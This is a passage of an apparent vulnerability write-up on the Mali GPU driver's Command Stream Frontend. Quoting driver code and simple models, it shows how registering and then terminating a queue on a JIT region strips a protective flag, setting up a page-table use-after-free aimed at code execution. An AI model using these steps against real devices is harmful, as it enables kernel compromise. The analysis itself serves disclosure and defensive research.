<p><img src="/assets/mali-csf-exploit/fig1-alias-region-mapping.png" alt="Alias region mapping example: the alias region's Page 0 maps to Region 1's backing Page 1, Page 1 is unmapped, and Pages 2 and 3 map to Region 2's backing Pages 0 and 1 respectively." /></p>
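
<p>The layout in the figure can also be written down as data. The sketch below is a simplified model, assuming each aliased source occupies a fixed-size slot of <code class="language-plaintext highlighter-rouge">stride</code> pages in the alias region, which is how the gap at alias page 1 arises in the example. <code class="language-plaintext highlighter-rouge">struct alias_src</code>, <code class="language-plaintext highlighter-rouge">struct alias_target</code> and <code class="language-plaintext highlighter-rouge">resolve_alias_page</code> are hypothetical names and do not correspond to the driver's own structures.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;stddef.h&gt;

/* Hypothetical description of one aliased source range. */
struct alias_src {
	int region;    /* backing region number (1 or 2 in the example) */
	size_t offset; /* first backing page to alias, in pages */
	size_t length; /* number of backing pages to alias */
};

/* Result of a lookup; region == 0 means the alias page is unmapped. */
struct alias_target {
	int region;
	size_t page;
};

/* Resolve which backing page an alias page refers to, assuming each
 * source takes up a slot of `stride` pages in the alias region.
 */
static struct alias_target resolve_alias_page(const struct alias_src *srcs,
					      size_t nents, size_t stride,
					      size_t alias_page)
{
	struct alias_target t = { 0, 0 };
	size_t slot, idx;

	if (stride == 0)
		return t;

	slot = alias_page / stride;
	idx = alias_page % stride;

	if (slot &gt;= nents || idx &gt;= srcs[slot].length)
		return t; /* past the end, or a gap inside the slot */

	t.region = srcs[slot].region;
	t.page = srcs[slot].offset + idx;
	return t;
}

int main(void)
{
	/* The example from the figure: a 4-page alias region, stride of 2 */
	const struct alias_src srcs[] = {
		{ 1, 1, 1 }, /* region 1, starting at page 1, 1 page */
		{ 2, 0, 2 }, /* region 2, starting at page 0, 2 pages */
	};
	size_t i;

	for (i = 0; i &lt; 4; i++) {
		struct alias_target t = resolve_alias_page(srcs, 2, 2, i);

		if (t.region)
			printf("alias page %zu -&gt; region %d page %zu\n",
			       i, t.region, t.page);
		else
			printf("alias page %zu -&gt; unmapped\n", i);
	}
	return 0;
}
</code></pre></div></div>

<p>Under this model, alias pages 0, 2 and 3 resolve to region 1 page 1, region 2 page 0 and region 2 page 1, and alias page 1 stays unmapped, matching the figure.</p>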

<h2 id="command-stream-frontend-csf">Command Stream Frontend (CSF)</h2>

<p>The idea behind the command stream frontend implementation is the use of queues to
represent a command stream that can be used to submit instructions to the GPU. This
circumvents the need to encapsulate a series of GPU instructions into a GPU job that is
thereafter submitted to the driver for processing. Instructions in the CSF can be fed sequentially
into the GPU as a stream and multiple streams can exist at once, with all of them being
controlled by the same queue group. The handling of these instructions is done by the CSF
firmware which was introduced with the GPUs that implement this new architecture. The
firmware runs on a dedicated MCU to offload some computational burden from the main processor. It interacts with the GPU hardware and performs actions such as
loading instructions to the GPU and keeping track of the GPU status. The CSF makes use of
<code class="language-plaintext highlighter-rouge">struct kbase_kcpu_command_queue</code> to handle commands meant for CPU processing,
analogous to a softjob in the old job manager implementation. These kcpu queues support
operations such as importing user buffer memory and JIT allocation of GPU memory. The
queues are created with the ioctl <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_KCPU_QUEUE_CREATE</code> and commands are
enqueued on them with <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_KCPU_QUEUE_ENQUEUE</code>. JIT memory
can therefore be easily allocated and freed through the enqueue ioctl, which will be shown to be important for exploiting the vulnerability.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_csf_kcpu_queue_enqueue</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_ioctl_kcpu_queue_enqueue</span> <span class="o">*</span><span class="n">enq</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">kbase_kcpu_command_queue</span> <span class="o">*</span><span class="n">queue</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">user_cmds</span> <span class="o">=</span> <span class="n">u64_to_user_ptr</span><span class="p">(</span><span class="n">enq</span><span class="o">-&gt;</span><span class="n">addr</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">(</span><span class="n">i</span> <span class="o">!=</span> <span class="n">enq</span><span class="o">-&gt;</span><span class="n">nr_commands</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">ret</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">,</span> <span class="o">++</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">csf</span><span class="p">.</span><span class="n">kcpu_queues</span><span class="p">.</span><span class="n">num_cmds</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="k">struct</span> <span class="n">base_kcpu_command</span> <span class="n">command</span><span class="p">;</span>
		<span class="p">...</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">command</span><span class="p">,</span> <span class="n">user_cmds</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">command</span><span class="p">)))</span> <span class="p">{</span>
			<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
			<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="p">...</span>
		<span class="k">switch</span> <span class="p">(</span><span class="n">command</span><span class="p">.</span><span class="n">type</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="k">case</span> <span class="n">BASE_KCPU_COMMAND_TYPE_JIT_ALLOC</span><span class="p">:</span>
			<span class="n">ret</span> <span class="o">=</span> <span class="n">kbase_kcpu_jit_allocate_prepare</span><span class="p">(</span><span class="n">queue</span><span class="p">,</span>
				<span class="o">&amp;</span><span class="n">command</span><span class="p">.</span><span class="n">info</span><span class="p">.</span><span class="n">jit_alloc</span><span class="p">,</span> <span class="n">kcpu_cmd</span><span class="p">);</span>
			<span class="k">break</span><span class="p">;</span>
		<span class="k">case</span> <span class="n">BASE_KCPU_COMMAND_TYPE_JIT_FREE</span><span class="p">:</span>
			<span class="n">ret</span> <span class="o">=</span> <span class="n">kbase_kcpu_jit_free_prepare</span><span class="p">(</span><span class="n">queue</span><span class="p">,</span>
				<span class="o">&amp;</span><span class="n">command</span><span class="p">.</span><span class="n">info</span><span class="p">.</span><span class="n">jit_free</span><span class="p">,</span> <span class="n">kcpu_cmd</span><span class="p">);</span>
			<span class="k">break</span><span class="p">;</span>
		<span class="p">...</span>
		<span class="p">}</span>
	<span class="p">}</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">ret</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="n">kthread_queue_work</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">csf</span><span class="p">.</span><span class="n">kcpu_queues</span><span class="p">.</span><span class="n">csf_kcpu_worker</span><span class="p">,</span>
			<span class="o">&amp;</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">work</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The CSF framework has a second type of queue, used for submitting
instructions to the GPU. It is created with the <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_REGISTER</code>
ioctl, which ends up in <code class="language-plaintext highlighter-rouge">csf_queue_register_internal</code>. This function creates a
queue that uses a user-specified GPU memory region as a ring buffer for command insertion. The enclosing region is looked up from the user-supplied address, and the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag is set on it [1] to prevent userspace from freeing
the region while the queue is using it.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">csf_queue_register_internal</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_register</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span> <span class="c1">// user controlled struct</span>
		<span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_register_ex</span> <span class="o">*</span><span class="n">reg_ex</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">queue_addr</span> <span class="o">=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">buffer_gpu_addr</span><span class="p">;</span>
	<span class="n">queue_size</span> <span class="o">=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">buffer_size</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">region</span> <span class="o">=</span> <span class="n">kbase_region_tracker_find_region_enclosing_address</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span>
					    <span class="n">queue_addr</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">kbase_is_region_invalid_or_free</span><span class="p">(</span><span class="n">region</span><span class="p">))</span> <span class="p">{</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
		<span class="k">goto</span> <span class="n">out_unlock_vm</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="p">...</span>
	<span class="n">queue</span> <span class="o">=</span> <span class="n">kzalloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_queue</span><span class="p">),</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">kctx</span> <span class="o">=</span> <span class="n">kctx</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">base_addr</span> <span class="o">=</span> <span class="n">queue_addr</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">queue_reg</span> <span class="o">=</span> <span class="n">region</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">size</span> <span class="o">=</span> <span class="p">(</span><span class="n">queue_size</span> <span class="o">&lt;&lt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">csi_index</span> <span class="o">=</span> <span class="n">KBASEP_IF_NR_INVALID</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">enabled</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">region</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">region</span><span class="o">-&gt;</span><span class="n">user_data</span> <span class="o">=</span> <span class="n">queue</span><span class="p">;</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<h1 id="the-vulnerability">The vulnerability</h1>

<p>The vulnerability is the improper removal of a protective flag from an allocated JIT region. This allows alias allocations to be abused to cause a UAF of GPU page table pages, which in turn gives arbitrary control of page table entries and can easily be leveraged to achieve code execution.</p>

<p>Taking another look at <code class="language-plaintext highlighter-rouge">csf_queue_register_internal</code>, we see that when a new CSF command stream queue is registered, the driver accepts any valid GPU address for which it can find a region and uses that region as the queue’s ring buffer. The region type is not checked or filtered: as long as the region is not invalid or free [1], it will be used. The function then sets the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag on the region [2],
which has no effect on a JIT region because that flag is already set when memory is allocated for the
region (this is elaborated in the next section).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">csf_queue_register_internal</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_register</span> <span class="o">*</span><span class="n">reg</span><span class="p">,</span> <span class="c1">// user controlled struct</span>
		<span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_register_ex</span> <span class="o">*</span><span class="n">reg_ex</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">queue_addr</span> <span class="o">=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">buffer_gpu_addr</span><span class="p">;</span>
	<span class="n">queue_size</span> <span class="o">=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">buffer_size</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">region</span> <span class="o">=</span> <span class="n">kbase_region_tracker_find_region_enclosing_address</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span>
					    <span class="n">queue_addr</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">kbase_is_region_invalid_or_free</span><span class="p">(</span><span class="n">region</span><span class="p">))</span> <span class="p">{</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
		<span class="k">goto</span> <span class="n">out_unlock_vm</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="p">...</span>
	<span class="n">queue</span> <span class="o">=</span> <span class="n">kzalloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_queue</span><span class="p">),</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
	<span class="p">...</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">kctx</span> <span class="o">=</span> <span class="n">kctx</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">base_addr</span> <span class="o">=</span> <span class="n">queue_addr</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">queue_reg</span> <span class="o">=</span> <span class="n">region</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">size</span> <span class="o">=</span> <span class="p">(</span><span class="n">queue_size</span> <span class="o">&lt;&lt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">csi_index</span> <span class="o">=</span> <span class="n">KBASEP_IF_NR_INVALID</span><span class="p">;</span>
	<span class="n">queue</span><span class="o">-&gt;</span><span class="n">enabled</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
	<span class="p">...</span>
	<span class="n">region</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
	<span class="n">region</span><span class="o">-&gt;</span><span class="n">user_data</span> <span class="o">=</span> <span class="n">queue</span><span class="p">;</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The register ioctl has a terminate counterpart, <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_CS_QUEUE_TERMINATE</code>. It triggers <code class="language-plaintext highlighter-rouge">kbase_csf_queue_terminate</code>, which, unsurprisingly,
releases the queue and clears the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag on the queue’s ring buffer
region.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kbase_csf_queue_terminate</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span>
	      <span class="k">struct</span> <span class="n">kbase_ioctl_cs_queue_terminate</span> <span class="o">*</span><span class="n">term</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">queue</span> <span class="o">=</span> <span class="n">find_queue</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">term</span><span class="o">-&gt;</span><span class="n">buffer_gpu_addr</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">queue</span><span class="p">)</span> <span class="p">{</span>
		<span class="p">...</span>
		<span class="n">unbind_queue</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">queue</span><span class="p">);</span>
		<span class="p">...</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">WARN_ON</span><span class="p">(</span><span class="o">!</span><span class="n">queue</span><span class="o">-&gt;</span><span class="n">queue_reg</span><span class="p">))</span> <span class="p">{</span>
			<span class="cm">/* After this the Userspace would be able to free the
			 * memory for GPU queue. In case the Userspace missed
			 * terminating the queue, the cleanup will happen on
			 * context termination where tear down of region tracker
			 * would free up the GPU queue memory.
			 */</span>
			<span class="n">queue</span><span class="o">-&gt;</span><span class="n">queue_reg</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;=</span> <span class="o">~</span><span class="n">KBASE_REG_NO_USER_FREE</span><span class="p">;</span>
			<span class="n">queue</span><span class="o">-&gt;</span><span class="n">queue_reg</span><span class="o">-&gt;</span><span class="n">user_data</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="p">...</span>
		<span class="n">release_queue</span><span class="p">(</span><span class="n">queue</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Registering a queue on a JIT region and then terminating it thus removes the <code class="language-plaintext highlighter-rouge">KBASE_REG_NO_USER_FREE</code> flag from that region and allows it to be aliased, which has major consequences, as we’ll see in a bit. JIT and alias regions are covered in more detail in the next section.</p>
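
<p>The flag handling above can be condensed into a small userspace model. This is only a sketch: <code class="language-plaintext highlighter-rouge">struct model_region</code>, <code class="language-plaintext highlighter-rouge">MODEL_NO_USER_FREE</code> and the <code class="language-plaintext highlighter-rouge">model_*</code> helpers are hypothetical stand-ins rather than driver code, and the bit value is a placeholder. It shows that a region which already carried the flag before registration loses it once the queue is terminated, because the terminate path clears the bit unconditionally.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdbool.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Placeholder bit; the real KBASE_REG_NO_USER_FREE value is not modelled. */
#define MODEL_NO_USER_FREE (1u &lt;&lt; 0)

/* Hypothetical stand-in for the parts of struct kbase_va_region used here. */
struct model_region {
	uint32_t flags;
	void *user_data;
};

/* Mirrors the tail of csf_queue_register_internal: set the flag, link the queue. */
static void model_queue_register(struct model_region *region, void *queue)
{
	region-&gt;flags |= MODEL_NO_USER_FREE;
	region-&gt;user_data = queue;
}

/* Mirrors kbase_csf_queue_terminate: the flag is cleared without checking
 * whether it was already set before the queue was registered.
 */
static void model_queue_terminate(struct model_region *region)
{
	region-&gt;flags &amp;= ~MODEL_NO_USER_FREE;
	region-&gt;user_data = NULL;
}

static bool model_is_protected(const struct model_region *region)
{
	return (region-&gt;flags &amp; MODEL_NO_USER_FREE) != 0;
}

/* Returns true when a region that was protected before registration
 * (like a JIT region) ends up unprotected after register + terminate.
 */
static bool model_jit_region_loses_flag(void)
{
	struct model_region jit = { .flags = MODEL_NO_USER_FREE, .user_data = NULL };
	int dummy_queue = 0;

	model_queue_register(&amp;jit, &amp;dummy_queue); /* flag was already set */
	model_queue_terminate(&amp;jit);                  /* flag is now gone */
	return !model_is_protected(&amp;jit);
}
</code></pre></div></div>

<p>In this model, <code class="language-plaintext highlighter-rouge">model_jit_region_loses_flag</code> returns true, whereas an ordinary region that starts without the flag simply returns to its original state.</p>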

<h1 id="leveraging-the-vulnerability">Leveraging the vulnerability</h1>

<p>Enqueueing a <code class="language-plaintext highlighter-rouge">BASE_KCPU_COMMAND_TYPE_JIT_FREE</code> command into a kcpu queue will
eventually trigger the function <code class="language-plaintext highlighter-rouge">kbase_kcpu_jit_free_process</code>, leading to <code class="language-plaintext highlighter-rouge">kbase_jit_free</code>
being called.</p>

<p>When the value of <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> is less than the current backed size of the region,
<code class="language-plaintext highlighter-rouge">kbase_jit_free</code> uses <code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code> to reduce the number of GPU page table
entries and free the corresponding backing physical pages.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kbase_jit_free</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="n">reg</span><span class="p">)</span>
<span class="p">{</span>
    <span class="p">...</span>
    <span class="cm">/* Get current size of JIT region */</span>
    <span class="n">old_pages</span> <span class="o">=</span> <span class="n">kbase_reg_current_backed_size</span><span class="p">(</span><span class="n">reg</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">initial_commit</span> <span class="o">&lt;</span> <span class="n">old_pages</span><span class="p">)</span> <span class="p">{</span>
        <span class="cm">/* Free trim_level % of region, but don't go below initial
         * commit size
         */</span>
        <span class="n">u64</span> <span class="n">new_size</span> <span class="o">=</span> <span class="n">MAX</span><span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">initial_commit</span><span class="p">,</span>
                <span class="n">div_u64</span><span class="p">(</span><span class="n">old_pages</span> <span class="o">*</span> <span class="p">(</span><span class="mi">100</span> <span class="o">-</span> <span class="n">kctx</span><span class="o">-&gt;</span><span class="n">trim_level</span><span class="p">),</span> <span class="mi">100</span><span class="p">));</span>
        <span class="n">u64</span> <span class="n">delta</span> <span class="o">=</span> <span class="n">old_pages</span> <span class="o">-</span> <span class="n">new_size</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">delta</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">mutex_lock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">reg_lock</span><span class="p">);</span>
            <span class="n">kbase_mem_shrink</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">reg</span><span class="p">,</span> <span class="n">old_pages</span> <span class="o">-</span> <span class="n">delta</span><span class="p">);</span>
            <span class="n">mutex_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">kctx</span><span class="o">-&gt;</span><span class="n">reg_lock</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_mem_shrink</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="k">const</span> <span class="n">kctx</span><span class="p">,</span>
		<span class="k">struct</span> <span class="n">kbase_va_region</span> <span class="o">*</span><span class="k">const</span> <span class="n">reg</span><span class="p">,</span> <span class="n">u64</span> <span class="n">new_pages</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="n">old_pages</span> <span class="o">=</span> <span class="n">kbase_reg_current_backed_size</span><span class="p">(</span><span class="n">reg</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">WARN_ON</span><span class="p">(</span><span class="n">old_pages</span> <span class="o">&lt;</span> <span class="n">new_pages</span><span class="p">))</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

	<span class="n">delta</span> <span class="o">=</span> <span class="n">old_pages</span> <span class="o">-</span> <span class="n">new_pages</span><span class="p">;</span>

	<span class="cm">/* Update the GPU mapping */</span>
	<span class="n">err</span> <span class="o">=</span> <span class="n">kbase_mem_shrink_gpu_mapping</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">reg</span><span class="p">,</span>
			<span class="n">new_pages</span><span class="p">,</span> <span class="n">old_pages</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
		<span class="cm">/* Update all CPU mapping(s) */</span>
		<span class="n">kbase_mem_shrink_cpu_mapping</span><span class="p">(</span><span class="n">kctx</span><span class="p">,</span> <span class="n">reg</span><span class="p">,</span>
				<span class="n">new_pages</span><span class="p">,</span> <span class="n">old_pages</span><span class="p">);</span>

		<span class="n">kbase_free_phy_pages_helper</span><span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">cpu_alloc</span><span class="p">,</span> <span class="n">delta</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">cpu_alloc</span> <span class="o">!=</span> <span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="p">)</span>
			<span class="n">kbase_free_phy_pages_helper</span><span class="p">(</span><span class="n">reg</span><span class="o">-&gt;</span><span class="n">gpu_alloc</span><span class="p">,</span> <span class="n">delta</span><span class="p">);</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">new_size</code> in the <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> snippet above is the larger of <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> and the
trimmed page count determined by <code class="language-plaintext highlighter-rouge">kctx-&gt;trim_level</code>. To trigger
<code class="language-plaintext highlighter-rouge">kbase_mem_shrink</code>, we therefore need to reduce the value of <code class="language-plaintext highlighter-rouge">reg-&gt;initial_commit</code> and set
<code class="language-plaintext highlighter-rouge">kctx-&gt;trim_level</code> to a suitable value. The <code class="language-plaintext highlighter-rouge">KBASE_IOCTL_MEM_JIT_INIT</code> ioctl
calls <code class="language-plaintext highlighter-rouge">kbase_region_tracker_init_jit</code> to set up the JIT configuration of the current
<code class="language-plaintext highlighter-rouge">kbase_context</code> from user-controlled values, so <code class="language-plaintext highlighter-rouge">kctx-&gt;trim_level</code> can be arbitrarily specified [1]. JIT allocations can subsequently be made using
kcpu queues.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">kbase_region_tracker_init_jit</span><span class="p">(</span><span class="k">struct</span> <span class="n">kbase_context</span> <span class="o">*</span><span class="n">kctx</span><span class="p">,</span> <span class="n">u64</span> <span class="n">jit_va_pages</span><span class="p">,</span>
		<span class="kt">int</span> <span class="n">max_allocations</span><span class="p">,</span> <span class="kt">int</span> <span class="n">trim_level</span><span class="p">,</span> <span class="kt">int</span> <span class="n">group_id</span><span class="p">,</span>
		<span class="n">u64</span> <span class="n">phys_pages_limit</span><span class="p">)</span>
<span class="p">{</span>
	<span class="p">...</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_max_allocations</span> <span class="o">=</span> <span class="n">max_allocations</span><span class="p">;</span>
		<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">trim_level</span> <span class="o">=</span> <span class="n">trim_level</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
		<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_va</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
		<span class="n">kctx</span><span class="o">-&gt;</span><span class="n">jit_group_id</span> <span class="o">=</span> <span class="n">group_id</span><span class="p">;</span>
		<span class="p">...</span>
	<span class="p">}</span>
	<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
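
<p>To make the shrink arithmetic in <code class="language-plaintext highlighter-rouge">kbase_jit_free</code> concrete, the sketch below reimplements only the <code class="language-plaintext highlighter-rouge">new_size</code> computation in plain C. <code class="language-plaintext highlighter-rouge">model_jit_trim_target</code> is a hypothetical helper, it assumes a <code class="language-plaintext highlighter-rouge">trim_level</code> between 0 and 100, and the page counts mentioned afterwards are made-up illustrative values; only the formula is taken from the driver snippet.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdint.h&gt;

/* Hypothetical helper: number of pages a JIT region keeps after kbase_jit_free,
 * following new_size = MAX(initial_commit, old_pages * (100 - trim_level) / 100).
 * Assumes 0 &lt;= trim_level &lt;= 100.
 */
static uint64_t model_jit_trim_target(uint64_t old_pages, uint64_t initial_commit,
		int trim_level)
{
	uint64_t trimmed;

	/* The driver only shrinks when initial_commit is below the backed size. */
	if (initial_commit &gt;= old_pages)
		return old_pages;

	trimmed = old_pages * (uint64_t)(100 - trim_level) / 100;
	return initial_commit &gt; trimmed ? initial_commit : trimmed;
}
</code></pre></div></div>

<p>With a <code class="language-plaintext highlighter-rouge">trim_level</code> of 100 the trimmed term is zero, so a region with 64 backed pages and an <code class="language-plaintext highlighter-rouge">initial_commit</code> of 1 would be shrunk to a single page, freeing 63 pages. With a <code class="language-plaintext highlighter-rouge">trim_level</code> of 0, nothing is freed regardless of <code class="language-plaintext highlighter-rouge">initial_commit</code>.</p>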

